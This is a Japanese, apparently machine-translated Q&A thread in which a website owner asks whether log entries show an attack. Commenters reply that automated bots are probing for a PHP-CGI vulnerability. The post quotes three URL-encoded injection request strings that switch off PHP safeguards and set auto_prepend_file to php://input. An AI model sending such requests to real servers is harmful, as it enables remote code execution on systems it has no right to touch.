8
私はこの質問に先だって、私はウェブ開発者ではないと言っていますが、この分野で多くの知識を持っていません。私はビジネスオーナーであり、顧客が製品を購入する少量のウェブサイトを持っています。私は数分前にこの一連のクエリに気付きました。彼らは私には疑いの余地があります。彼らは私のデータベースからデータを取得しようとしているかのように見えますか?私は完全に間違っているかもしれないが、誰かが私が彼らがここで何が起こっていると思うかを教えてください。私のサイトは攻撃されていますか? Suhosinシミュレーション、IPログの非常に奇妙なアクティビティ
注:
- 最も通常の視聴者がGETとしてリストされている場合は、すべてのPOSTの方法で記載されています。
- 私のドメイン名の直後に以下のすべてが発生します。ここでexamplesite.com/xxxxxxxx
クエリです:
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
約6より類似したクエリ。
注:私はそのリンクに従うと、私のサイトはページが見つかりませんでした。 site.com/cgi-bin/にアクセスしようとすると、私のホストから在庫403禁じられたエラーが発生します。
お願いします。私はここで妄想していますか?
編集:また、私のファイルマネージャで、私のcgi-binフォルダは空です: 'このディレクトリは空です'。
Stackoverflowはプログラミングに関する質問のみです。代わりにhttp://serverfault.com/を試すことをおすすめします。 – kviiri
@kviiriこの質問は、アプリケーションレベルのセキュリティに関連し、私の意見ではStackOverflowのために十分な話題です。 – Brad
URLを訪問しようとしたときに実際に500回/成功したリクエストを受け取らない限り、問題はないはずです。特定のPHP CGIアクセス脆弱性を持つサイトを見つけようとする自動化されたロボットです。 –